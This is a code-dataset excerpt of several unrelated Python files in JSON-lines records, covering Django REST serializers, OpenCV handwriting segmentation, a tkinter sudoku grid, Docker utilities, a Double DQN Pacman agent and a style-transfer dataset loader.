value:\n return value\n\n extra = {\n field_name: field.to_representation(getattr(value, field_name))\n for field_name, field in self._fields\n }\n return {\n **extra,\n 'id': self.pk_field.to_representation(value.pk),\n }\n\n def get_choices(self, cutoff=None):\n \"\"\"Returns choices for DRF UI.\n\n Standard implementation uses a dict, but that doesn't work as our\n representation isn't hashable.\n \"\"\"\n queryset = self.get_queryset()\n if queryset is None:\n return ()\n\n if cutoff is not None:\n queryset = queryset[:cutoff]\n\n return _Choices(\n (\n self.pk_field.to_representation(item.pk),\n self.display_value(item),\n )\n for item in queryset\n )\n\n\nRelaxedDateField = partial(serializers.DateField, input_formats=('iso-8601', '%Y/%m/%d'))\n\n\nclass RelaxedDateTimeField(serializers.Field):\n \"\"\"\n Relaxed DateTime field.\n\n Front end uses free text field for data filters, that's why\n we need to accept date/datetime in various different formats.\n DRF DateTimeField doesn't offer that flexibility.\n \"\"\"\n\n default_error_messages = {\n 'invalid': 'Date is in incorrect format.',\n }\n\n def to_internal_value(self, data):\n \"\"\"Parses data into datetime.\"\"\"\n try:\n data = dateutil_parse(data)\n except ValueError:\n self.fail('invalid', value=data)\n return data\n\n def to_representation(self, value):\n \"\"\"Formats the datetime using a normal DateTimeField.\"\"\"\n repr_field = serializers.DateTimeField()\n return repr_field.to_representation(value)\n\n\nclass RelaxedURLField(serializers.URLField):\n \"\"\"URLField subclass that prepends http:// to input and output when a scheme is not present.\"\"\"\n\n def to_internal_value(self, data):\n \"\"\"Converts a user-provided value to an internal value.\"\"\"\n return super().to_internal_value(self._fix_missing_url_scheme(data))\n\n def to_representation(self, value):\n \"\"\"Converts a stored value to the external representation.\"\"\"\n return super().to_representation(self._fix_missing_url_scheme(value))\n\n @staticmethod\n def _fix_missing_url_scheme(value):\n if value and '://' not in value:\n return f'http://{value}'\n return value\n\n\nclass _Choices:\n \"\"\"Wrapper for choices to make them compatible with DRF.\"\"\"\n\n def __init__(self, choices):\n self._choices = choices\n\n def items(self):\n \"\"\"Returns the choices.\"\"\"\n return self._choices\n\n\nclass AddressSerializer(serializers.ModelSerializer):\n \"\"\"\n ModelSerializer that can be used to simulate nested address objects.\n\n E.g.\n\n Model:\n class MultiAddressModel(models.Model):\n primary_address_1 = models.CharField(max_length=MAX_LENGTH)\n primary_address_2 = models.CharField(max_length=MAX_LENGTH, blank=True)\n primary_address_town = models.CharField(max_length=MAX_LENGTH)\n primary_address_county = models.CharField(max_length=MAX_LENGTH, blank=True)\n primary_address_country = models.ForeignKey(\n Country, on_delete=models.PROTECT, related_name='+',\n )\n primary_address_postcode = models.CharField(max_length=MAX_LENGTH, blank=True)\n\n secondary_address_1 = models.CharField(max_length=MAX_LENGTH, blank=True)\n secondary_address_2 = models.CharField(max_length=MAX_LENGTH, blank=True, null=True)\n secondary_address_town = models.CharField(max_length=MAX_LENGTH, blank=True)\n secondary_address_county = models.CharField(max_length=MAX_LENGTH, blank=True)\n secondary_address_country = models.ForeignKey(\n Country, null=True, on_delete=models.SET_NULL, related_name='+',\n )\n secondary_address_postcode = models.CharField(max_length=MAX_LENGTH, blank=True)\n\n Serializer:\n class MultiAddressModelSerializer(serializers.ModelSerializer):\n primary_address = AddressSerializer(\n source_model=MultiAddressModel,\n address_source_prefix='primary_address',\n )\n secondary_address = AddressSerializer(\n source_model=MultiAddressModel,\n address_source_prefix='secondary_address',\n required=False,\n allow_null=True,\n )\n\n class Meta:\n model = MultiAddressModel\n fields = ['primary_address', 'secondary_address']\n\n Will produce the following API response:\n {\n 'primary_address': {\n 'line_1': '2',\n 'line_2': '',\n 'town': 'London',\n 'county': '',\n 'postcode': '',\n 'country': {\n 'id': '80756b9a-5d95-e211-a939-e4115bead28a',\n 'name': 'United Kingdom',\n },\n },\n 'secondary_address': {\n 'line_1': '1',\n 'line_2': '',\n 'town': 'Muckamore',\n 'county': '',\n 'postcode': '',\n 'country': {\n 'id': '736a9ab2-5d95-e211-a939-e4115bead28a',\n 'name': 'Ireland',\n },\n },\n },\n\n Please note:\n 1. None values for CharFields will be converted to ''\n 2. If all address field values are blank the nested object in the response will return None\n\n E.g. Fiven the following fields' values:\n secondary_address_1=''\n secondary_address_2=''\n secondary_address_town=''\n secondary_address_county=''\n secondary_address_postcode=''\n secondary_address_country_id=None\n\n The equivalent API response body will be:\n 'secondary_address': None\n\n The same applies for changing the data.\n 3. If AddressSerializer has required=False, the validation is triggered only if at least\n one of the fields is passed in.\n \"\"\"\n\n line_1 = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_1',\n )\n line_2 = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_2',\n )\n town = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_town',\n )\n county = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_county',\n )\n postcode = serializers.CharField(\n max_length=MAX_LENGTH,\n allow_blank=True,\n required=False,\n default='',\n source='{source_prefix}_postcode',\n )\n area = NestedRelatedField(\n AdministrativeArea,\n allow_null=True,\n required=False,\n source='{source_prefix}_area',\n )\n country = NestedRelatedField(\n Country,\n allow_null=True,\n required=False,\n source='{source_prefix}_country',\n )\n\n REQUIRED_FIELDS = (\n 'line_1',\n 'town',\n 'country',\n )\n\n def __init__(\n self, source_model, *args,\n address_source_prefix='address', area_can_be_required=False,\n postcode_can_be_required=False, **kwargs,\n ):\n \"\"\"\n Initialises the serializer.\n\n It populates all necessary parts (e.g. Meta model, source, fields' source).\n \"\"\"\n # Define a custom Meta so that the Meta model can be specified as an argument\n class MultiAddressMeta(self.Meta):\n model = source_model\n self.Meta = MultiAddressMeta\n\n kwargs.setdefault('source', '*')\n\n super().__init__(*args, **kwargs)\n\n # populate fields' source\n for field in self.fields.values():\n field.source = field.source.format(source_prefix=address_source_prefix)\n field.source_attrs = field.source.split('.')\n\n self.area_can_be_required = area_can_be_required\n self.postcode_can_be_required = postcode_can_be_required\n self.address_source_prefix = address_source_prefix\n\n def add_area_validator(self, validators):\n \"\"\"\n Mark area as required for US and Canadian companies.\n \"\"\"\n validators.append(\n RulesBasedValidator(\n ValidationRule(\n 'required',\n OperatorRule(f'{self.address_source_prefix}_area', bool),\n when=InRule(\n f'{self.address_source_prefix}_country',\n (\n CountryEnum.united_states.value.id,\n CountryEnum.canada.value.id,\n ),\n ),\n ),\n ),\n )\n\n def add_postcode_validator(self, validators):\n \"\"\"\n Mark postcode as required for US and Canadian companies.\n \"\"\"\n validators.append(\n RulesBasedValidator(\n ValidationRule(\n 'required',\n OperatorRule(f'{self.address_source_prefix}_postcode', bool),\n when=InRule(\n f'{self.address_source_prefix}_country',\n (\n CountryEnum.united_states.value.id,\n CountryEnum.canada.value.id,\n ),\n ),\n ),\n ),\n )\n\n def get_validators(self):\n \"\"\"\n Append ValidationRule for area/postcode depending on feature flag/context\n\n Only mark area/postcode required if country is US/Canada & called from context where area\n is safe to require, and if feature flag enabled. Currently the only context where area is\n safe to require is CompanySerializer\n \"\"\"\n validators = super().get_validators()\n\n if self.area_can_be_required:\n self.add_area_validator(validators)\n\n if self.postcode_can_be_required:\n self.add_postcode_validator(validators)\n\n return validators\n\n def run_validation(self, data=serializers.empty):\n \"\"\"\n Converts None to dict with default values so that those values can be used to\n reset the fields on the model.\n \"\"\"\n if data or not self.allow_null:\n normalised_data = data\n else:\n normalised_data = {\n field_name: None if (field.default == serializers.empty) else field.default\n for field_name, field in self.fields.items()\n }\n return super().run_validation(data=normalised_data)\n\n def to_representation(self, value):\n \"\"\"\n It returns None if none of the address values is set.\n E.g.\n {\n 'address': None\n }\n instead of\n {\n 'address': {\n 'line_1': '',\n 'line_2': '',\n 'town': '',\n 'county': '',\n 'postcode': '',\n 'country': None\n }\n }\n \"\"\"\n address_dict = super().to_representation(value)\n if not any(address_dict.values()):\n return None\n\n # for each address field, replace None with default if possible\n for field_name, value in address_dict.items():\n field_default = self.fields[field_name].default\n\n if value is None and field_default is not serializers.empty:\n address_dict[field_name] = field_default\n\n return address_dict\n\n def should_validate(self, data_combiner):\n \"\"\"\n Returns true if the data should be validated.\n \"\"\"\n if self.required:\n return True\n\n return any(\n data_combiner.get_value(field.source)\n for field in self.fields.values()\n )\n\n def validate(self, attrs):\n \"\"\"\n Validates the data if necessary.\n This is needed because some addresses only need to be validated\n if they are passed in.\n \"\"\"\n validated_data = super().validate(attrs)\n\n data_combiner = DataCombiner(self.parent.instance, validated_data)\n if self.should_validate(data_combiner):\n errors = {}\n for field_name in self.REQUIRED_FIELDS:\n field = self.fields[field_name]\n value = data_combiner.get_value(field.source)\n if not value:\n errors[field_name] = self.error_messages['required']\n\n if errors:\n raise ValidationError(errors)\n\n return validated_data\n\n class Meta:\n \"\"\"Meta options.\"\"\"\n\n model = None\n fields = (\n 'line_1',\n 'line_2',\n 'town',\n 'county',\n 'postcode',\n 'area',\n 'country',\n )\n","repo_name":"uktrade/data-hub-api","sub_path":"datahub/core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":17672,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"31670152278","text":"import numpy as np\nimport cv2\nimport operator\n\n\ndef extract_hand_written(gray):\n \"\"\"\n This function returns original cropped image and dilated cropped image \n for the handwritten part only and exclude any unused parts.\n \"\"\"\n # Apply binary thresholding using otsu's method to inverse the background and content color.\n thresh_inv = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n\n # Apply noise removal.\n blur = cv2.GaussianBlur(thresh_inv, (3, 3), 0)\n\n # Apply thresholding for better and more general output.\n binary = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n\n # Apply dilation to the image to make sure that horizontal lines are continuous.\n # Taking a matrix of size 4,2 as the kernel\n kernel = np.ones((4, 1), np.uint8)\n img_dilation = cv2.dilate(binary, kernel, iterations=3)\n\n # Find lines by using contour\n # Find contours\n contours, hierarchy = cv2.findContours(img_dilation,\n cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n # Find bounded rectangles surround the contours\n bounding_rectangles = [None] * len(contours)\n for i in range(len(contours)):\n bounding_rectangles[i] = cv2.boundingRect(contours[i])\n\n # Sort bounding rectangles descendingly according to width\n bounding_rectangles.sort(key=operator.itemgetter(2), reverse=True)\n\n lines = [] # store the three horizontal lines\n for i in range(len(bounding_rectangles)):\n append = True\n for j in range(len(lines)):\n if abs(bounding_rectangles[i][1] - lines[j][1]) < 100:\n append = False\n if append:\n lines.append(bounding_rectangles[i])\n if len(lines) > 2:\n break\n\n lines.sort(key=operator.itemgetter(1)) # sort lines ascendingly according to height\n\n first_crop_line_height = lines[1][1] + lines[1][3]\n second_crop_line_height = lines[2][1]\n\n # Crop the original image and the dilated image\n segmented_image = img_dilation[first_crop_line_height + 10:second_crop_line_height - 10, :]\n segmented_image_original = gray[first_crop_line_height + 10:second_crop_line_height - 10, :]\n return segmented_image, segmented_image_original\n\n\ndef detect_sentences(segmented_image, segmented_image_original):\n \"\"\"\n This function detect sentences and return a list of detected sentences.\n \"\"\"\n # Apply erosion to remove noise.\n kernel = np.ones((3, 5), np.uint8)\n img_erosion = cv2.erode(segmented_image, kernel, iterations=3)\n\n # Apply dilation to connect sentence together as one block\n # Taking a matrix of size 3,10 as the kernel \n kernel = np.ones((2, 25), np.uint8)\n img_dilation = cv2.dilate(img_erosion, kernel, iterations=11)\n\n # Find contours\n contours, hierarchy = cv2.findContours(img_dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n # Find bounded rectangles surround the contours\n bounding_rectangles = [None] * len(contours)\n for i in range(len(contours)):\n bounding_rectangles[i] = cv2.boundingRect(contours[i])\n\n sentences = []\n # Loop on the contours and crop each sentence\n i = len(contours) - 1\n while i >= 0:\n difference_in_width = bounding_rectangles[i][2]\n difference_in_height = bounding_rectangles[i][3]\n if difference_in_width > 600 and difference_in_height > 50:\n initial_height = int(bounding_rectangles[i][1]) - 20\n if initial_height < 0:\n initial_height = 0\n seg_sentence = np.copy(segmented_image_original[initial_height:int(bounding_rectangles[i][1])\n + difference_in_height,\n int(bounding_rectangles[i][0]) + 50:int(bounding_rectangles[i][0])\n + difference_in_width - 50])\n sentences.append(seg_sentence)\n i -= 1\n return sentences\n\n\ndef preprocessing(img):\n \"\"\"\n This function pre-process the image and return list of sentences.\n \"\"\"\n # Extract hand written part\n segmented_image, segmented_image_original = extract_hand_written(img)\n # Apply noise removal.\n segmented_image_original = cv2.GaussianBlur(segmented_image_original, (3, 3), 0)\n # Extract sentences\n sentences = detect_sentences(segmented_image, segmented_image_original)\n return sentences\n","repo_name":"shadyfahmy/writer-identification-system","sub_path":"source/preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7569745568","text":"#kharbozeeeeeeeeeeeee\nfrom tkinter import *\nimport tkinter.messagebox\nfrom tkinter import messagebox\nimport tkinter.font as font\n\nroot=Tk()\n\nroot.geometry('500x500')\nroot.resizable(True,True)\nroot.title(\"suduku!!!\")\n\nent=[]\n\nfor i in range(1,10):\n for j in range (1,10):\n ent.append(Entry(root, width=4))\n ent[len(ent)-1].grid(row=i, column=j)\n\n\ninp=[]\n\ndef catcher():\n for i in range(9):\n for j in range (9):\n inp.append(ent[i*9+j].get())\n\n\n\ndef block_check():\n catcher()\n\n\nbuttonFont = font.Font(family='Helvetica', size=10, weight='bold')\nbtn_submit = Button(root, text = 'Finish',font=buttonFont, fg = \"red\", bg = 'brown', width=30, command=block_check())\nbtn_submit.grid(row = 10, column = 1, columnspan=9)\n\nroot.mainloop()\n\n##from tkinter import *\n##from tkinter import messagebox\n##\n##root = Tk()\n##root.title('suduko.game')\n##window = grid(root,row = 8,column = 4,padx = 20,pady = 30)\n##def change_frame(frame):\n## frame.tkraise()\n##\n##suduco_page = Frame(root)\n##menu_page = Frame(root)\n##\n###in label zir fake\n##\n##hello = Label(root,fg = 'black')\n##hello.grid(row = 1,column = 1)\n##\n##for frame in (suduco_page, menu_page):\n## frame.grid(heghth = 6,wgheit = 7, sticky='news')\n## \n##\n##easy = Button(menu_page,padx = 30,pady = 12, text='easy', command = lambda:change_frame(suduco_page))\n##easy.grid(row = 3,column = 6)\n##\n##normal = Button(menu_page,padx = 30,pady = 12, text='normal', command = lambda:change_frame(suduco_page))\n##normal.grid(row = 1,column = 1)\n##\n##hard = Button(menu_page,padx = 30,pady = 12, text='hard', command = lambda:change_frame(suduco_page))\n##hard.grid(row = 2,column = 2)\n##\n###\n##Button(suduco_page, text='<- back', command = lambda:change_frame(menu_page))\n\n","repo_name":"mosacode/suduku","sub_path":"suduko.py","file_name":"suduko.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24080502890","text":"def solution(land, P, Q):\n lst = []\n for i in land:\n lst += i\n print(i)\n lst = sorted(lst)\n print(lst)\n n = len(lst)\n #모두제거\n answer = sum(lst)*Q\n #맨밑으로제거\n cost = (sum(lst) - lst[0]*n )*Q\n answer = min(answer, cost)\n\n for i in range(1, n):\n if lst[i] != lst[i-1]:\n #추가 + 복원\n cost += (P * i * (lst[i]-lst[i-1])) - (Q * (n-i) * (lst[i]-lst[i-1]))\n answer = min(answer, cost)\n\n return answer\nsolution([[1, 2], [2, 3]],3,2)\n","repo_name":"Leesungsup/algo-test","sub_path":"지형편집.py","file_name":"지형편집.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19136498003","text":"from functools import wraps\nfrom pathlib import Path\nfrom typing import Callable, List\nimport docker\n\nfrom .config import config\n\n\ndef ensure_build_dir(f: Callable) -> Callable:\n \"\"\"Ensures that the build directory exists before running the decorated function\n\n Args:\n f (Callable): The function to decorate\n\n Returns:\n Callable: The decorated function\n \"\"\"\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n Path(config.BUILD_DIR).mkdir(exist_ok=True, parents=True)\n return f(*args, **kwargs)\n\n return wrapper\n\n\nclass Singleton(type):\n \"\"\"A singleton metaclass\"\"\"\n\n _instance = None\n\n def __call__(cls, *args, **kwargs):\n \"\"\"Creates a new instance of the class if one does not already exist\n\n Returns:\n cls._instance: The instance of the class\n \"\"\"\n if cls._instance is None:\n cls._instance = super().__call__(*args, **kwargs)\n return cls._instance\n\n\ndef next_free_tcp_port(port: int) -> int:\n \"\"\"Finds the next free port after the specified port\n\n Args:\n port (int): The port to start searching from\n\n Raises:\n ValueError: If no free ports are found\n\n Returns:\n int: The next free port\n \"\"\"\n ports: List[int] = []\n try:\n containers = config.CLIENT.containers.list(all=True)\n ports = []\n for container in containers:\n port_values = container.ports.values()\n if not port_values:\n continue\n for x in list(container.ports.values())[0]:\n ports.append(int(x[\"HostPort\"]))\n except docker.errors.NotFound: # type: ignore\n # * This error is raised if container list changes between getting the list and\n # * getting the ports. If this happens, just try again\n return next_free_tcp_port(port)\n if not ports:\n return port\n unique_ports = set(ports)\n while port in unique_ports:\n port += 1\n if port > 65535:\n raise ValueError(\"No free ports\")\n return port\n","repo_name":"Cian-H/I-Form_Server_Node_Deployer","sub_path":"src/node_deployer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2015444415","text":"\"\"\"\n.. moduleauthor:: Eric Torres\n\nUnit tests for the rbackup.struct.snapshot module.\n\"\"\"\n\nimport unittest\nfrom pathlib import Path\nfrom unittest.mock import DEFAULT, patch\n\nfrom rbackup.struct.snapshot import Snapshot\n\n# ========== Constants ==========\nTESTING_PACKAGE = \"rbackup.struct\"\nTESTING_MODULE = f\"{TESTING_PACKAGE}.snapshot\"\n\n\n# ========== Tests ==========\nclass TestSnapshotProperties(unittest.TestCase):\n def setUp(self):\n self.patched_path = patch.multiple(\n Path, exists=DEFAULT, mkdir=DEFAULT, symlink_to=DEFAULT, touch=DEFAULT\n )\n self.patched_metadata = patch.multiple(\n Snapshot, read_metadata=DEFAULT, write_metadata=DEFAULT\n )\n\n self.mocked_path = self.patched_path.start()\n self.mocked_metadata = self.patched_metadata.start()\n\n self.mocked_path[\"exists\"].return_value = False\n\n def test_ctime_returns_str(self):\n self.assertIsInstance(Snapshot(\"/tmp/backup/snapshot\").ctime, str)\n\n def tearDown(self):\n patch.stopall()\n","repo_name":"etorres4/rbackup","sub_path":"tests/test_snapshot.py","file_name":"test_snapshot.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14596854006","text":"##We have coded the transpose of 3 by 3 matrix \n\nnew_matrix= [[],[],[]]\ndef t_mat(mat):\n for i in range(3):\n for j in range(3):\n new_matrix[j][i]= mat[i][j]\n print(j,i,'=',i,j)\n return new_matrix\n \nprint(t_mat([[1,2,3],[4,5,6],[7,8,9]]))\n","repo_name":"hassankaleem/Advanced-Python-Tutorials","sub_path":"Unit 3 Week 3/week 3 transpose.py","file_name":"week 3 transpose.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"13404481911","text":"# Modified version of\n# DQN implementation by Tejas Kulkarni found at\n# https://github.com/mrkulk/deepQN_tensorflow\n\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\n\n#使用DQN算法\nclass DoubleDQN:\n def __init__(self, params):\n self.params = params # 传入常数(from pacman_Agents)\n self.network_name = 'DDQnet' # network的名字\n self.sess = tf.Session() # sess赋类\n\n self.x = tf.placeholder('float', [None, params['width'], params['height'], 6], name=self.network_name + '_x')\n self.x_ = tf.placeholder('float', [None, params['width'], params['height'], 6], name=self.network_name + '_x_')\n self.q_t = tf.placeholder('float', [None], name=self.network_name + '_q_t')\n # quality target\n self.actions = tf.placeholder(\"float\", [None, 4], name=self.network_name + '_actions')\n # action的选择\n self.rewards = tf.placeholder(\"float\", [None], name=self.network_name + '_rewards')\n # action对应得到的rewards\n self.terminals = tf.placeholder(\"float\", [None], name=self.network_name + '_terminals')\n # 是否终结 1表示终结,0表示未终结\n\n # def _build_net(self,params):\n ##########################################################################\n # 第一种network:一层CNN,一层MLP,一层输出\n def build_layers(x,names):\n # Layer 1 (Convolutional)\n layer_name = 'conv2' ; size = 3 ; channels = 6 ; filters = 16 ; stride = 1\n self.w2 = tf.Variable(tf.random_normal([size,size,channels,filters], stddev=0.01),name=self.network_name + '_'+layer_name+'_weights',collections=names)\n self.b2 = tf.Variable(tf.constant(0.1, shape=[filters]),name=self.network_name + '_'+layer_name+'_biases',collections=names)\n self.c2 = tf.nn.conv2d(x, self.w2, strides=[1, stride, stride, 1], padding='SAME',name=self.network_name + '_'+layer_name+'_convs')\n self.o2 = tf.nn.relu(tf.add(self.c2,self.b2),name=self.network_name + '_'+layer_name+'_activations')\n o2_shape = self.o2.get_shape().as_list()\n\n # Layer 2 (Fully connected)\n layer_name = 'fc3' ; hiddens = 256 ; dim = o2_shape[1]*o2_shape[2]*o2_shape[3]\n self.o2_flat = tf.reshape(self.o2, [-1,dim],name=self.network_name + '_'+layer_name+'_input_flat')\n self.w3 = tf.Variable(tf.random_normal([dim,hiddens], stddev=0.01),name=self.network_name + '_'+layer_name+'_weights',collections=names)\n self.b3 = tf.Variable(tf.constant(0.1, shape=[hiddens]),name=self.network_name + '_'+layer_name+'_biases',collections=names)\n self.ip3 = tf.add(tf.matmul(self.o2_flat,self.w3),self.b3,name=self.network_name + '_'+layer_name+'_ips')\n self.o3 = tf.nn.relu(self.ip3,name=self.network_name + '_'+layer_name+'_activations')\n\n # Layer 3 output\n layer_name = 'fc4' ; hiddens = 4 ; dim = 256\n self.w4 = tf.Variable(tf.random_normal([dim,hiddens], stddev=0.01),name=self.network_name + '_'+layer_name+'_weights',collections=names)\n self.b4 = tf.Variable(tf.constant(0.1, shape=[hiddens]),name=self.network_name + '_'+layer_name+'_biases',collections=names)\n self.y = tf.add(tf.matmul(self.o3,self.w4),self.b4,name=self.network_name + '_'+layer_name+'_outputs')\n\n return self.y\n\n ################### build eval net ##############################################\n with tf.variable_scope('eval_net'):\n self.y_eval= build_layers(x=self.x,names=['eval_net_params', tf.GraphKeys.GLOBAL_VARIABLES])\n self.y = self.y_eval\n #Q,Cost,Optimizer\n self.discount = tf.constant(self.params['discount']) #1-terminal:判断是否为terminal step;discount:参数;\n # # 计算Q_target(使用贝尔曼公式计算得到的理论值)\n self.yj = tf.add(self.rewards, tf.multiply(1.0-self.terminals, tf.multiply(self.discount, self.q_t)))\n self.y_eval_action = tf.reduce_sum(tf.multiply(self.y_eval, self.actions),reduction_indices=1)\n with tf.variable_scope('loss'):\n # 计算loss(cost),用MSE\n self.cost = tf.reduce_sum(tf.pow(tf.subtract(self.yj, self.y_eval_action), 2))\n\n with tf.variable_scope('optim'):\n # 为global_step开新变量寄存\n if self.params['load_file'] is not None:\n self.global_step = tf.Variable(int(self.params['load_file'].split('_')[-1]), name='global_step',\n trainable=False)\n else:\n self.global_step = tf.Variable(0, name='global_step', trainable=False)\n\n #Adam方法进行优化\n self.optim = tf.train.AdamOptimizer(self.params['lr']).minimize(self.cost, global_step=self.global_step)\n ################### build target net #############################################\n with tf.variable_scope('target_net'):\n c_names = ['target_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n self.y_next= build_layers(self.x_,c_names)\n self.y_next_action = tf.reduce_sum(tf.multiply(self.y_next, self.actions),reduction_indices=1)\n\n self.saver = tf.train.Saver(max_to_keep=0)\n # tf.reset_default_graph()\n self.sess.run(tf.global_variables_initializer()) # 再次初始化\n # 储存神经网络变量\n t_params = tf.get_collection('target_net_params')\n e_params = tf.get_collection('eval_net_params')\n self.replace_target_op = [tf.assign(t, e) for t, e in zip(t_params, e_params)]\n if self.params['load_file'] is not None:\n print('Loading checkpoint...')\n self.saver.restore(self.sess,self.params['load_file'])\n # DDQN主体\n def train(self,bat_s,bat_a,bat_t,bat_n,bat_r,cnt):\n if cnt % 100 ==0:\n self.sess.run(self.replace_target_op)\n\n feed_dict={self.x: bat_n,self.x_: bat_n,self.q_t: np.zeros(bat_n.shape[0]), self.actions: bat_a, self.terminals:bat_t, self.rewards: bat_r}\n # 运行Network\n q_next,q_eval4next= self.sess.run([self.y_next,self.y_eval],feed_dict=feed_dict) #32*4 (batch_size,hiddens)\n batch_index = np.arange(self.params['batch_size'], dtype=np.int32)\n max_act4next = np.argmax(q_eval4next, axis=1) # the action that brings the highest value is evaluated by q_eval\n selected_q_next = q_next[batch_index, max_act4next] # Double DQN, select q_next depending on above actions\n\n #传入 bat_s:state(observation);q_t:target quality;bat_a:action;\n feed_dict={self.x: bat_s,self.x_: bat_s,self.q_t:selected_q_next , self.actions: bat_a, self.terminals:bat_t, self.rewards: bat_r}\n _,cnt,cost = self.sess.run([self.optim, self.global_step,self.cost],feed_dict=feed_dict)\n return cnt, cost\n\n def save_ckpt(self,filename):\n self.saver.save(self.sess, filename)\n","repo_name":"Mr-OREO/CourseworkOfSE","sub_path":"人工智能导论(课程综合实践Ⅰ)/Project/PacmanDQN-master_group9/Double_DQN.py","file_name":"Double_DQN.py","file_ext":"py","file_size_in_byte":7034,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"35739331417","text":"import os\nimport zipfile\nimport numpy as np\nimport PIL.Image as Image\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\nfrom torch.hub import download_url_to_file\nfrom config import DATASET_URL\n\nDATASET_TRANSFORM = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(256),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\nGENERAL_TRANSFORM = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\nINV_NORMALIZE = transforms.Normalize(\n mean=[-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.255],\n std=[1 / 0.229, 1 / 0.224, 1 / 0.255]\n)\n\ndef load_img(path):\n img = Image.open(path).convert('RGB')\n return img\n\nclass CustomDataset(Dataset):\n def __init__(self, path):\n super().__init__()\n\n if not os.path.exists(path):\n os.makedirs(path)\n tmp = os.path.join(path, 'dataset.zip')\n print(f'Downloading dataset from {DATASET_URL} to {tmp}...')\n download_url_to_file(DATASET_URL, tmp)\n\n print(f'Unzipping {tmp}...')\n with zipfile.ZipFile(tmp) as zf:\n zf.extractall(path=path)\n os.remove(tmp)\n else:\n print(f'Dataset path exists, skipping download')\n\n self.data = []\n self.root = path\n self.classes = os.listdir(path)\n for i in range(len(self.classes)):\n files = os.listdir(os.path.join(path, self.classes[i]))\n self.data += list(zip(files, [i] * len(files)))\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n file, label = self.data[index]\n dir = os.path.join(self.root, self.classes[label])\n return DATASET_TRANSFORM(load_img(os.path.join(dir, file)))\n\nif __name__ == '__main__':\n cd = CustomDataset('dataset')\n img = cd[0]\n print(img.shape)\n plt.imshow(np.moveaxis(img.cpu().detach().numpy(), 0, -1))\n plt.show()","repo_name":"sidharthNair/style-transfer","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1812214920","text":"# # We use process parallelism, so multi-threading tends to hurt our performance\n# import os\n# os.environ[\"OMP_NUM_THREADS\"] = \"1\"\n# os.environ[\"MKL_NUM_THREADS\"] = \"1\"\n# os.environ[\"OPENBLAS_NUM_THREADS\"] = \"1\"\n\n# TEMP\nfrom run import run, parse_args\nfrom sim import run_sim\nfrom systems.doubleintegrator import DoubleIntegrator\nfrom other_policy import Empty_Net_wAPF, ZeroPolicy, GoToGoalPolicy\n\n# standard\nfrom torch import nn, tanh, relu\nimport torch\nimport numpy as np\nfrom collections import namedtuple\nimport os\n\nclass DoubleIntegratorParam():\n\tdef __init__(self):\n\t\tself.env_name = 'DoubleIntegrator'\n\t\tself.env_case = None\n\n\t\t# some path param\n\t\tself.preprocessed_data_dir = 'data/preprocessed_data/'\n\t\tself.default_instance = \"map_8by8_obst6_agents8_ex0001.yaml\"\n\t\tself.current_model = 'il_current.pt'\n\n\t\t# dont change these sim param (same as ORCA baseline)\n\t\tself.n_agents = 4\n\t\tself.r_comm = 3. \n\t\tself.r_obs_sense = 3.\n\t\tself.r_agent = 0.15 \n\t\tself.r_obstacle = 0.5\n\t\tself.v_max = 0.5\n\t\tself.a_max = 2.0 \n\t\tself.v_min = -1*self.v_max\n\t\tself.a_min = -1*self.a_max\n\n\t\t# sim \n\t\tself.sim_t0 = 0\n\t\tself.sim_tf = 5 \n\t\tself.sim_dt = 0.5\n\t\tself.sim_times = np.arange(self.sim_t0,self.sim_tf,self.sim_dt)\n\t\tself.sim_nt = len(self.sim_times)\n\t\tself.plots_fn = 'plots.pdf'\n\n\t\t# for batching/speed\n\t\tself.max_neighbors = 6\n\t\tself.max_obstacles = 6\n\t\tself.rollout_batch_on = True\n\t\t\t\t\n\t\t# safety parameters\n\t\tself.safety = \"cf_di_2\" \n\t\tif self.safety == 